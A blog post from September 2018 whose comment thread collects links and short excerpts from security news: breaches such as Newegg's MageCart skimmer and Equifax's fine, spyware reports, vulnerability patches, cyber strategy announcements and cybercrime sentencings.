Cyber Security September 2018

This posting is here to collect security alert news in September 2018.

I post links to security vulnerability news to comments of this article.

 

493 Comments

  1. Tomi Engdahl says:

    Click It Up: Targeting Local Government Payment Portals
    https://www.fireeye.com/blog/threat-research/2018/09/click-it-up-targeting-local-government-payment-portals.html

    FireEye has been tracking a campaign this year targeting web payment portals that involves on-premise installations of Click2Gov. Click2Gov is a web-based, interactive self-service bill-pay software solution developed by Superion. It includes various modules that allow users to pay bills associated with various local government services such as utilities, building permits, and business licenses.

    In October 2017, Superion released a statement confirming suspicious activity had affected a small number of customers. In mid-June 2018, numerous media reports referenced at least seven Click2Gov customers that were possibly affected by this campaign.

    On June 15, 2018, Superion released a statement describing their proactive notification to affected customers,

    Reply
  2. Tomi Engdahl says:

    This Windows file may be secretly hoarding your passwords and emails
    https://www.zdnet.com/article/this-windows-file-may-be-secretly-hoarding-your-passwords-and-emails/

    A little-known Windows feature will create a file that stores text extracted from all the emails and plaintext-files found on your PC, which sometimes may reveal passwords or private conversations.

    Reply
  3. Tomi Engdahl says:

    Equifax fined £500,000 over customer data breach
    https://www.zdnet.com/article/equifax-fined-500000-over-customer-data-breach/

    If the security incident had taken place after GDPR came into play, the fine may have been far higher.

    Equifax has been issued a £500,000 fine after a catastrophic data breach in 2017 led to the compromise of data belonging to up to 15 million UK citizens.

    The credit monitoring service experienced a data breach last year in which 146 million records were stolen. Customers worldwide were affected, with the majority living in the United States.

    The information exposed due to lax security practices included names, dates of birth, addresses, phone numbers, driver’s license details, Social Security numbers, and credit card data.

    Reply
  4. Tomi Engdahl says:

    Newegg Credit Card Info Stolen For a Month by Injected MageCart Script
    https://www.bleepingcomputer.com/news/security/newegg-credit-card-info-stolen-for-a-month-by-injected-magecart-script/

    The malicious credit card stealing MageCart script behind the British Airlines and Feedify breaches have struck again, but this time against Newegg, one of the largest online technology retailers.

    Two reports released today by RisqIQ and Volexity detail how the MageCart script has been injected into the Newegg site for a little over a month while quietly stealing customer’s payment information.

    According to the reports, the attackers created a domain called neweggstats.com on August 13th. This domain was used as a drop site that collected credit card details stolen from Newegg’s site. Veloxity further stated that the attacks then went live on Newegg’s site around August 16th.

    As Newegg is one of the largest online retailers of technology components, computers, and hardware, the amount of victims affected by this breach can be quite large.

    “With the size of the business evaluated at $2.65 billion in 2016, Newegg is an extremely popular retailer,” security researcher Yonathan Klijnsma stated in RiskIQ blog post about this attack. “Alexa shows that Newegg has the 161st most popular site in the U.S. and Similarweb, which also gathers information on site visits, estimates Newegg receives over 50 million visitors a month.

    Another Victim of the Magecart Assault Emerges: Newegg
    https://www.riskiq.com/blog/labs/magecart-newegg/

    While the dust is settling on the British Airways compromise, the Magecart actor behind it has not stopped their work, hitting yet another large merchant: Newegg.

    Reply
  5. Tomi Engdahl says:

    This Toy Can Open Any Garage
    https://www.youtube.com/watch?v=CNodxp9Jy4A

    Or almost any garage – it’s particularly good with fixed code gates and garages. Samy proposes other weaknesses with rolling codes.

    “Opens the door to other issues..” ;-)

    Reply
  6. Tomi Engdahl says:

    They’re Drinking Your Milkshake: CTA’s Joint Analysis on Illicit Cryptocurrency Mining
    https://www.cyberthreatalliance.org/joint-analysis-on-illicit-cryptocurrency-mining/

    Reply
  7. Tomi Engdahl says:

    Extended Validation Certificates are Dead
    https://www.troyhunt.com/extended-validation-certificates-are-dead/

    That’s it – I’m calling it – extended validation certificates are dead. Sure, you can still buy them (and there are companies out there that would just love to sell them to you!), but their usefulness has now descended from “barely there” to “as good as non-existent”. This change has come via a combination of factors including increasing use of mobile devices, removal of the EV visual indicator by browser vendors and as of today, removal from Safari on iOS (it’ll also be gone in Mac OS Mojave when it lands next week)

    Reply
  8. Tomi Engdahl says:

    NSO Group Rejects Citizen Lab’s Findings on Pegasus Operations
    https://www.bleepingcomputer.com/news/security/nso-group-rejects-citizen-labs-findings-on-pegasus-operations/

    A report released today about the activity of Pegasus spyware presents evidence of the tool’s use outside the ethical boundaries publicized by its maker.

    Pegasus is a known spyware tool developed by Israel-based company NSO Group. It falls into the category of surveillance tools “that are licensed to legitimate government agencies for the sole purpose of investigating crime and terror.”

    The spyware has been the topic of many discussions over the years, mainly because it was found targeting journalists, lawyers and human rights activists considered a threat by the government of their country.

    Reply
  9. Tomi Engdahl says:

    Cybersecurity firm: More Iran hacks as US sanctions loomed
    https://apnews.com/88ab2debee36432d8d0498991e9f5768

    Reply
  10. Tomi Engdahl says:

    Crippling DDoS vulnerability put the entire Bitcoin market at risk
    This could have been waaaaay worse
    https://thenextweb.com/hardfork/2018/09/20/bitcoin-core-vulnerability-blockchain-ddos/

    The entire Bitcoin infrastructure has been issued with a stern warning: update Bitcoin Core software or risk having the whole thing collapse. Until now, Bitcoin miners could have brought down the entire blockchain by flooding full node operators with traffic, via a Distributed Denial-of-Service (DDoS) attack.

    “A denial-of-service vulnerability (CVE-2018-17144) exploitable by miners has been discovered in Bitcoin Core versions 0.14.0 up to 0.16.2.” the patch notes state. “It is recommended to upgrade any of the vulnerable versions to 0.16.3 as soon as possible.”

    As far as the attack vector in question goes, there’s a catch: anyone ballsy enough to try to bring down Bitcoin would have to sacrifice almost $80,000 worth of Bitcoin in order do it.

    The bug relates to its consensus code.

    only those willing to disregard block reward of 12.5BTC ($80,000) could actually do any real damage.

    Reply
  11. Tomi Engdahl says:

    I’m not exaggerating when I say this scares me. It’s like the “Nosedive” episode of Dark Mirror

    Leave no dark corner
    http://mobile.abc.net.au/news/2018-09-18/china-social-credit-a-model-citizen-in-a-digital-dictatorship/10200278?pfmredir=sm

    China is building a digital dictatorship to exert control over its 1.4 billion citizens. For some, “social credit” will bring privileges — for others, punishment.

    A vast network of 200 million CCTV cameras across China ensures there’s no dark corner in which to hide.

    Every step she takes, every one of her actions big or small — even what she thinks — can be tracked and judged.

    Wat may sound like a dystopian vision of the future is already happening in China. And it’s making and breaking lives.

    The Communist Party calls it “social credit” and says it will be fully operational by 2020.

    Within years, an official Party outline claims, it will “allow the trustworthy to roam freely under heaven while making it hard for the discredited to take a single step”.

    Reply
  12. Tomi Engdahl says:

    Computer System Security Requirements for IRS 1075: What You Need to Know
    https://www.tripwire.com/state-of-security/regulatory-compliance/computer-system-security-requirements-for-irs-1075-what-you-need-to-know/

    The IRS 1075 publication lays out a framework of compliance regulations to ensure federal tax information, or FTI, is treated with adequate security provisioning to protect its confidentiality. This may sound simple enough but IRS 1075 puts forth a complex set of managerial, operational and technical security controls you must continuously follow in order to maintain ongoing compliance.

    Any organization or agency that receives FTI needs to prove that they’re protecting that data properly with IRS 1075 compliance.

    Reply
  13. Tomi Engdahl says:

    Office of the Director of National Intelligence Common Cyber Threat Framework
    September 2, 2018
    https://publicintelligence.net/odni-cyber-threat-framework/

    A Common Cyber Threat Framework: A Foundation for Communication

    Reply
  14. Tomi Engdahl says:

    Encryption bill endorsed by govt party room
    https://itwire.com/government-tech-policy/84562-encryption-bill-endorsed-by-govt-party-room.html

    Pixabay
    Barely one week of parliamentary sitting days after the date for comment ended, the Federal Government’s party room has endorsed the contentious encryption bill and it could be introduced into the House of Representatives as early as Thursday.

    “That is to say that once you undermine the fundamental principle of encryption then Australia’s cyber security capabilities will be permanently diminished,” the spokesperson added.

    According to the draft, telecommunications and Internet companies and makers of digital devices will face fines of up to $10 million if they do not help law enforcement agencies gain access to data needed for investigating terrorism offences.

    Individuals will face fines of up to $50,000.

    Companies will be initially requested to co-operate with law enforcement; if they do not, the pressure will be stepped up to force them to help.

    First, there will be a “technical assistance request” that allows voluntary help by a company. The staff of the company will be given civil immunity from prosecution.

    Reply
  15. Tomi Engdahl says:

    Report: Financial industry in crosshairs of credential-stuffing botnets
    https://securityledger.com/2018/09/report-financial-industry-in-crosshairs-of-credential-stuffing-botnets/

    Botnets mounting credential-stuffing attacks against the financial industry are on the rise, with a more than 20-percent uptick in a two-month period, a new report from Akamai has found.

    Bad actors from the United States, Russia and Vietnam are using credential stuffing attacks to try to compromise financial services firms, Akamai says in its latest State of the Internet report.

    Reply
  16. Tomi Engdahl says:

    Catalin Cimpanu / ZDNet:
    China-based Huazhu Hotels Group says hacker who was selling 1.415GB data on millions of its guests and tried to blackmail the chain, has been arrested

    Chinese police arrest hacker who sold data of millions of hotel guests on the dark web
    https://www.zdnet.com/article/chinese-police-arrest-hacker-who-sold-data-of-millions-of-hotel-guests-on-the-dark-web/

    Hacker was selling 141.5GB of data from Huazhu Hotels Group. He also attempted to blackmail the hotel chain to pay for its own data.

    Reply
  17. Tomi Engdahl says:

    Worried About Privacy? 5 Alternatives to Google Maps
    https://www.eeweb.com/profile/max-maxfield/articles/if-youre-worried-about-privacy-here-are-five-alternatives-to-google-maps

    It seems that Google continues to track where you are even if the location tracking is switched off. Are you thrilled, troubled, or terrified by what the future holds?

    Are you worried about erosions to your privacy in this connected age? To be honest, I oscillate back and forth on this issue. I also fear that there’s not much that we can do about it.

    Reply
  18. Tomi Engdahl says:

    Increased Use of a Delphi Packer to Evade Malware Classification
    https://www.fireeye.com/blog/threat-research/2018/09/increased-use-of-delphi-packer-to-evade-malware-classification.html

    The concept of “packing” or “crypting” a malicious program is widely popular among threat actors looking to bypass or defeat analysis by static and dynamic analysis tools. Evasion of classification and detection is an arms race in which new techniques are traded and used in the wild. For example, we observe many crypting services being offered in underground forums by actors who claim to make any malware “FUD” or “Fully Undetectable” by anti-virus technologies, sandboxes and other endpoint solutions. We also see an increased effort to model normal user activity and baseline it as an effective countermeasure to fingerprint malware analysis environments.

    Reply
  19. Tomi Engdahl says:

    NSS Labs sues antivirus toolmakers, claims they quietly conspire to evade performance tests
    Alleges CrowdStrike, Symantec, ESET, Anti-Malware Testing Standards Org collusion
    https://www.theregister.co.uk/2018/09/20/security_testing_contratemps/

    NSS Labs has thrown a hand grenade into the always fractious but slightly obscure world of security product testing – by suing multiple vendors as well as an industry standards organisation.

    Its lawsuit, filed in California this week against CrowdStrike, Symantec, ESET, and the Anti-Malware Testing Standards Organization (AMTSO), has alleged no less than a conspiracy to cover up deficiencies in security tools.

    These vendors not only knew of bugs in their code and failed to act, but they were “actively conspiring to prevent independent testing that uncovers those product deficiencies,” NSS Labs claimed. The lawsuit hopes to illuminate bad practices that harm consumers, Vikram Phatak, chief exec of NSS Labs, claimed in a statement.

    NSS Labs vs. CrowdStrike, Symantec, ESET and the Anti-Malware Testing Standards Organization
    https://www.nsslabs.com/blog/company/advancing-transparency-and-accountability-in-the-cybersecurity-industry/

    Advancing Transparency and Accountability in the Cybersecurity Industry

    Reply
  20. Tomi Engdahl says:

    U.S. Takes Off the Gloves in Global Cyber Wars: Top Oficials
    https://www.securityweek.com/us-takes-gloves-global-cyber-wars-top-oficials

    The United States is taking off the gloves in the growing, shadowy cyber war waged with China, Russia and other rivals, a top White House official said Thursday.

    National Security Advisor John Bolton said the country’s “first fully articulated cyber strategy in 15 years” was now in effect.

    The new more aggressive posture follows a decision by President Donald Trump to revoke rules established by his predecessor Barack Obama to require high-level authority for any big military cyber operations.

    “Our hands are not tied as they were in the Obama administration,” Bolton said.

    “For any nation that’s taking cyber activity against the United States, they should expect… we will respond offensively, as well as defensively,” Bolton said.

    “Not every response to a cyber attack would be in the cyber world,” he added.

    Reply
  21. Tomi Engdahl says:

    Japan Digital Currency Exchange Hacked, Losing $60 Million
    https://www.securityweek.com/japan-digital-currency-exchange-hacked-losing-60-million

    TOKYO (AP) — Hackers have stolen 6.7 billion yen ($60 million) worth of cryptocurrencies from a Japanese digital currency exchange, the operators said Thursday.

    Tech Bureau Corp. said a server for its Zaif exchange was hacked for two hours last week, and some digital currencies got unlawfully relayed from what’s called a “hot wallet,” or where virtual coins are stored at such exchanges.

    Reply
  22. Tomi Engdahl says:

    China Arrests Suspect for Customer Data Leak at Accor Partner
    https://www.securityweek.com/china-arrests-suspect-customer-data-leak-accor-partner

    Shanghai police have arrested a man in connection with a data leak at NASDAQ-listed Chinese hotelier Huazhu Group after the suspect failed to sell the information online.

    The 30-year-old suspect had hacked and stolen user data from hotels under Huazhu Group and tried to sell it on overseas websites, the police said in a statement late Wednesday.

    Huazhu, one of China’s biggest hoteliers and the local partner of France-based AccorHotels, had alerted police to reports in August that the company’s internal data was being sold online.

    Huazhu Group said in a statement to the New York stock exchange on Monday that “the suspect also attempted to blackmail Huazhu by leveraging public pressure, without success”.

    The potentially-leaked data included guest membership information, personal IDs, check-in records, guest names, mobile numbers and emails.

    Reply
  23. Tomi Engdahl says:

    Department of Defense Releases New Cyber Strategy
    https://www.securityweek.com/department-defense-releases-new-cyber-strategy

    The U.S. Department of Defense this week released its 2018 cyber strategy, which outlines how the organization plans on implementing the country’s national security and defense strategies in cyberspace.

    The new cyber strategy, which supersedes the 2015 strategy, focuses on the competition with China and Russia, but it also mentions other actors, such as North Korea and Iran. The DoD says China has been “eroding U.S. military overmatch and the Nation’s economic vitality” by stealing information, while Russia has used cyber operations to influence elections.

    Reply
  24. Tomi Engdahl says:

    Unwiped Drives and Servers from NCIX Retailer for Sale on Craigslist
    https://www.bleepingcomputer.com/news/security/unwiped-drives-and-servers-from-ncix-retailer-for-sale-on-craigslist/

    Servers and storage disks filled with millions of unencrypted confidential records of employees, customers and business partners of computer retailer NCIX turned up for sale via a Craigslist advertisement.

    Up until December 1, 2017, when it filed for bankruptcy, NCIX was a privately-held company in Canada in the business of selling computer hardware and software.

    Reply
  25. Tomi Engdahl says:

    COI for SingHealth cyberattack: IT gaps, staff missteps contributed to incident, says Solicitor-General
    Read more at https://www.channelnewsasia.com/news/singapore/singhealth-cyberattack-committee-inquiry-staff-hack-10744182

    Reply
  26. Tomi Engdahl says:

    Scottish brewery recovers from ransomware attack
    Trouble ferments after hackers lock system and Arran with it
    https://www.theregister.co.uk/2018/09/21/arran_brewery_ransomware/

    Reply
  27. Tomi Engdahl says:

    Josh Taylor / BuzzFeed:
    Australian Minister for Home Affairs Peter Dutton accused of rushing legislation through parliament that tech companies say would weaken encryption

    While Everyone Was Distracted By Strawberries, Peter Dutton Introduced Laws To Snoop On Your Private Chats
    https://www.buzzfeed.com/joshtaylor/while-everyone-was-distracted-by-strawberries-peter-dutton

    The legislation was introduced into parliament just 10 days after consultation ended, and not all submissions have been made public.

    Home affairs minister Peter Dutton has been accused of rushing legislation that tech companies say could have the effect of weakening encryption, privacy and security of all Australians.

    The legislation if passed would force tech companies to: remove protections on devices, give law enforcement agencies the design specs of their devices, install software on a device when asked, provide access to devices, and help agencies build their own systems.

    The companies that would be most affected by the legislation, including Wickr, Facebook, Google and Amazon had all raised alarms that the requirements for companies to allow law enforcement agencies to exploit weaknesses in encryption to investigate serious crimes could also have the effect in creating vulnerability for law-abiding users, who rely on encryption for security and privacy online.

    Reply
  28. Tomi Engdahl says:

    Apple says it’s tracking your calls and emails to ‘prevent fraud’
    https://nypost.com/2018/09/20/apple-says-its-tracking-your-calls-and-emails-to-prevent-fraud/

    Apple has been advocating for unbreakable encryption and total user privacy for years, even if that put it at odds with governments around the world. That’s not just because it gave it an edge on the competition, forcing rivals to also somewhat embrace encryption and better privacy features, but also because Apple seems to genuinely believe that user data and privacy should be defended at all costs.

    Apple just added a new provision to the iTunes Store & Privacy policy that tells users that their devices will receive individual scores based on the number of phone calls they make and the emails they send

    Reply
  29. Tomi Engdahl says:

    Port of Barcelona Suffers Cyberattack
    https://www.bleepingcomputer.com/news/security/port-of-barcelona-suffers-cyberattack/

    The Port of Barcelona was Thursday morning the target of a cyberattack that affected some of its servers and systems, forcing the organization to launch the contingency plan designed specifically for these incidents.

    Details about the incident are scarce

    a later update on the matter announced that maritime operations had not affected in any way and all ships were operating within regular parameters

    Premonitory tweet or what?
    In a twist of irony, Port of Barcelona tweeted just two days before the attack that no one is safe from a cyberattack that puts at risk the activity and security of its stakeholders.

    Reply
  30. Tomi Engdahl says:

    Wall Street Journal:
    In letter to Congress, Google confirms it continues to allow third-party apps to scan and share data from Gmail accounts, though Google itself stopped doing so

    Google Says It Continues to Allow Apps to Scan Data From Gmail Accounts
    Lawmakers had asked company to explain policy in wake of WSJ report
    https://www.wsj.com/articles/google-says-it-continues-to-allow-apps-to-scan-data-from-gmail-accounts-1537459989?redirect=amp#click=https://t.co/0KcLZqrgOK

    Reply
  31. Tomi Engdahl says:

    Zack Whittaker / TechCrunch:
    Twitter says it fixed a bug that sent some users’ direct messages from their interactions with business accounts to third-party developers, since May 2017

    Twitter says bug may have exposed some direct messages to third-party developers
    https://techcrunch.com/2018/09/21/twitter-bug-sent-user-direct-messages-to-developers-for-over-a-year/

    Twitter said that a “bug” sent user’s private direct messages to third-party developers “who were not authorized to receive them.”

    “The issue has persisted since May 2017, but we resolved it immediately upon discovering it,” the message said, which was posted on Twitter by a Mashable reporter. “Our investigation into this issue is ongoing, but presently we have no reason to believe that any data sent to unauthorized developers was misused.”

    https://twitter.com/karissabe/status/1043204939026071552

    Reply
  32. Tomi Engdahl says:

    Catalin Cimpanu / ZDNet:
    Latvian hacker sentenced to 14 years in prison for creating and running Scan4You service that allowed malware authors to check the detection rates of their code — Ruslan Bondars run a “VirusTotal-for-crooks” operation from 2009 to 2017. — Ruslan Bondars, a 37-year-old man from Latvia …

    Hacker gets a whopping 14 years in prison for running Scan4You service
    Ruslan Bondars run a “VirusTotal-for-crooks” operation from 2009 to 2017
    https://www.zdnet.com/article/hacker-gets-a-whopping-14-years-in-prison-for-running-scan4you-service/

    Ruslan Bondars, a 37-year-old man from Latvia was sentenced to a whopping 14 years in prison for facilitating cybercrime by creating and running a service named Scan4You that allowed malware authors to check the detection rates of their malicious code.

    In the infosec industry, Scan4You is what security researchers and malware authors refer to as a “counter-anti-virus” or a “no-distribute-scanner.”

    Scan4You works similar to Google’s legitimate VirusTotal web service, in the way that it aggregates scan engines from multiple antivirus vendors and allows a user to check files against multiple antivirus programs at the same time. The only difference is that Scan4You does not allow the antivirus engines to report results back to vendors, keeping malware detections only for itself.

    Malware authors have been using services like Scan4You for years as a way to test malware before they launch it into real-world campaigns, fine-tuning their code to avoid detections.

    Bondars set up Scan4You on this model in 2009, and it quickly became the most popular service on the market.

    Bondars, too, was eventually arrested in May 2017

    According to court documents, Scan4You was hosted on Amazon Web Services servers, and malware authors had to pay to get full access to the scanner’s features.

    Trend Micro says the hacker was also behind many more other criminal activities.

    Reply
  33. Tomi Engdahl says:

    Specops Software:
    Office 365 is a prime target for login attacks — Global survey reveals low adoption of O365 multi-factor authentication (MFA), even though it prevents phishing, and some of the reasons why.
    https://specopssoft.com/our-resources/office-365-survey-report/?utm_source=Sponsored%20post%20-%20O365%20report&utm_campaign=Techmeme

    Reply
  34. Tomi Engdahl says:

    APPLE IS QUIETLY GIVING PEOPLE ‘TRUST SCORES’ BASED ON THEIR IPHONE DATA
    https://www.independent.co.uk/life-style/gadgets-and-tech/news/apple-trust-score-iphone-data-black-mirror-email-phone-fraud-a8546051.html

    iPhone, iPad, Apple Watch and Apple TV data is used to see how trustworthy you are, similar to a scenario in the dystopian series Black Mirror

    said in an update to its privacy policy that the scores would be determined by tracking the calls and emails made on Apple devices.

    In an update to its privacy, Apple said the rating system could be used to help fight fraud, though specific examples of how this would work were not given.

    Reply
  35. Tomi Engdahl says:

    Stephen Hiltner / New York Times:
    Defcon attendees say corporate demands, widespread professionalization, and bug bounty programs are reshaping hackers’ attitudes toward privacy and anonymity

    For Hackers, Anonymity Was Once Critical. That’s Changing.
    https://www.nytimes.com/2018/09/22/technology/defcon-hackers-privacy-anonymity.html

    At Defcon, one of the world’s largest hacking conferences, new pressures are reshaping the community’s attitudes toward privacy and anonymity.
    https://www.nytimes.com/2018/09/22/technology/defcon-hackers-privacy-anonymity.html

    Reply
  36. Tomi Engdahl says:

    eevBLAB #53 – Beware of Trademark Scams
    https://www.youtube.com/watch?v=qp-JyM3wCLg

    Beware of Trademark listing scams that look like official invoices to renew or protect your trademark.

    https://www.ipaustralia.gov.au/trade-marks/managing-your-trade-mark/unsolicited-invoices

    Reply
  37. Tomi Engdahl says:

    Credential Stuffing Attacks Are Reaching DDoS Proportions
    https://www.securityweek.com/credential-stuffing-attacks-are-reaching-ddos-proportions

    Credential stuffing is a growing threat. It is not new, but for many companies it is treated as annoying background noise that can be absorbed by bandwidth, handled by access controls, and ignored. New figures suggest that this is a bad approach.

    Credential stuffing typically uses bots to test many hundreds of thousands of stolen credential pairs against fresh targets. It doesn’t afford a high return for the attacker, but it is a low cost, low risk attack that occasionally hits the jackpot. The attacker is relying on users’ habit of reusing the same password across multiple accounts.

    It isn’t clear exactly where the credentials come from — but there have been dozens of major breaches, hundreds of minor breaches, and an unknown number of unreported breaches over the last few years — and we know that criminals aggregate stolen databases and sell them on. We are usually told that stolen passwords have been hashed; but since credential stuffing can only happen with plaintext passwords, either some of the databases were never hashed, or that hashing is not as secure against cracking as we would like to believe.

    Reply
  38. Tomi Engdahl says:

    Bug Exposed Direct Messages of Millions of Twitter Users
    https://www.securityweek.com/millions-twitter-users-affected-information-exposure-flaw

    Millions of Twitter Users Affected by Information Exposure Flaw

    Twitter has patched a bug that may have caused direct messages to be sent to third-party developers other than the ones users interacted with. The problem existed for well over a year and it impacted millions of users.

    According to Twitter, the issue is related to the Account Activity API (AAAPI), which allows developers registered on the social network’s developer program to build tools designed to better support businesses and their customer communications on the platform.

    Reply
  39. Tomi Engdahl says:

    Cisco Removes Default Password From Video Surveillance Manager
    https://www.securityweek.com/cisco-removes-default-password-video-surveillance-manager

    A critical vulnerability recently patched in the Cisco Video Surveillance Manager (VSM) could allow an unauthenticated attacker to log in as root.

    The security flaw, Cisco revealed on Friday, impacts only the VSM software running on certain Connected Safety and Security Unified Computing System (UCS) platforms. The issue, the company says, resides in the presence of default, static credentials for the root account

    Reply
  40. Tomi Engdahl says:

    Industry Reactions to New National Cyber Strategy
    https://www.securityweek.com/industry-reactions-new-national-cyber-strategy

    The White House last week announced the release of the 2018 National Cyber Strategy, which outlines the government’s plans for ensuring the security of cyberspace.

    Described by officials as the “first fully articulated cyber strategy in 15 years,”

    Dave Weinstein, VP of Threat Research at Claroty:

    “Most government strategy documents tend to be underwhelming and this one is no different. This isn’t a whole lot of new content or ideas, but rather amplification, clarification, and renewal of previous ones.

    The paragraph that stands out to me is the one on the Cyber Deterrence Initiative. Until now we haven’t formally adopted an international approach to deterrence, which includes collaborating on incident response and attribution.

    On critical infrastructure, it’s encouraging to see it featured so prominently in the Strategy but the substance is a bit lacking

    Reply
  41. Tomi Engdahl says:

    New Virobot Ransomware and Botnet Emerge
    https://www.securityweek.com/new-virobot-ransomware-and-botnet-emerges

    Dubbed Virobot, the threat not only encrypts files on infected machines, but it also ensnares the system into a spam botnet and leverages it to spread itself to other victims.

    First discovered on September 17, 2018, Virobot checks compromised machines for the presence of specific registry keys to determine if the system should be encrypted.

    Reply
  42. Tomi Engdahl says:

    Western Digital Releases Hotfix for My Cloud Auth Bypass Vulnerability
    https://www.bleepingcomputer.com/news/security/western-digital-releases-hotfix-for-my-cloud-auth-bypass-vulnerability/

    Western Digital has just released an hotfix firmware update to resolve the authentication bypass vulnerability (CVE-2018-17153) that had remained unpatched in My Cloud NAS devices for over a year.

    This vulnerability allowed anyone to bypass authentication and get administrative access to the router. Once an attacker gains access to a router, they can flash it with customer firmware, change DNS to point users to phishing sites, or perform other malicious activities.

    Reply
  43. Tomi Engdahl says:

    The ‘Opsec Fail’ That Helped Unmask a North Korean State Hacker
    https://www.darkreading.com/threat-intelligence/the-opsec-fail-that-helped-unmask-a-north-korean-state-hacker-/d/d-id/1332870

    How Park Jin Hyok – charged by the US government for alleged computer crimes for the Sony, Bank of Bangladesh, WannaCry cyberattacks – inadvertently blew his cover via email accounts.

    Reply
  44. Tomi Engdahl says:

    Emotet on the rise with heavy spam campaign
    https://blog.malwarebytes.com/cybercrime/2018/09/emotet-rise-heavy-spam-campaign/

    The threat landscape is changing once again, now that the ocean of cryptocurrency miners has shrunk to a small lake. Over the last couple months, we’ve seen cybercriminals lean back on tried and true methods of financial theft and extortion, with the rise of a familiar Banking Trojan: Emotet.

    Reply
  45. Tomi Engdahl says:

    Simple Authentication and Security Layer (SASL) vulnerabilities
    https://blog.malwarebytes.com/cybercrime/2018/09/simple-authentication-and-security-layer-sasl-vulnerabilities/

    Simple Authentication and Security Layer (SASL) is an authentication layer used in Internet protocols. SASL is not a protocol, but rather a framework that provides developers of applications and shared libraries with mechanisms for authentication, data integrity–checking, and encryption.

    Within the framework and a few of its plugins, there are a couple of known vulnerabilities that we want to make you aware of. Although patches have been issued, not everyone has implemented them.

    Most server administrators will recognize the acronym from this type of error message or report:

    “SASL LOGIN authentication failed: authentication failure”

    SASL attacks usually turn out to be brute force attacks, meaning an automated script or a bot is trying over and over to log into an existing email account on your server, trying many combinations of credentials to find a valid username and password pair. Thankfully, there are some countermeasures you can take against these attacks.

    If you have the option to make your server listen on a different port, doing so might make you a less likely target for new attacks.
    If the SASL message is from the same IP all the time, block that IP in your firewall.
    If the attackers keep coming at you from different IPs, there are software solutions that use machine learning to automatically block any new assailant. One caveat to this solution: Be vigilant about false positives so that you don’t shut out legitimate users, such as remote employees.

    SASL is a framework for application protocols, such as SMTP or IMAP, that adds authentication support. It checks whether the user has the proper permissions to use the server in the way they request. It also offers a framework for data integrity–checking and encryption.

    Reply
  46. Tomi Engdahl says:

    Operator of ‘VirusTotal for criminals’ gets 14-year prison sentence
    https://www.cyberscoop.com/scan4you-ruslan-bondars-latvian-hacker-sentenced/

    Reply
  47. Tomi Engdahl says:

    Twitter notifies users about API bug that shared DMs with wrong devs
    https://www.zdnet.com/article/twitter-notifies-developers-about-api-bug-that-shared-dms-with-wrong-devs/#ftag=RSSbaffb68

    Twitter said the API bug was active between May 2017 and early September 2018, for nearly 16 months.

    Reply
  48. Tomi Engdahl says:

    Malware Disguised as Job Offers Distributed on Freelance Sites
    https://www.bleepingcomputer.com/news/security/malware-disguised-as-job-offers-distributed-on-freelance-sites/

    Attackers are using freelance job sites such as fiverr and Freelancer to distribute malware disguised as job offers. These job offers contain attachments that pretends to be the job brief, but are actually installers for keyloggers such as Agent Tesla or Remote Access Trojan (RATs).

    Reply

Leave a Comment

Your email address will not be published. Required fields are marked *

*

*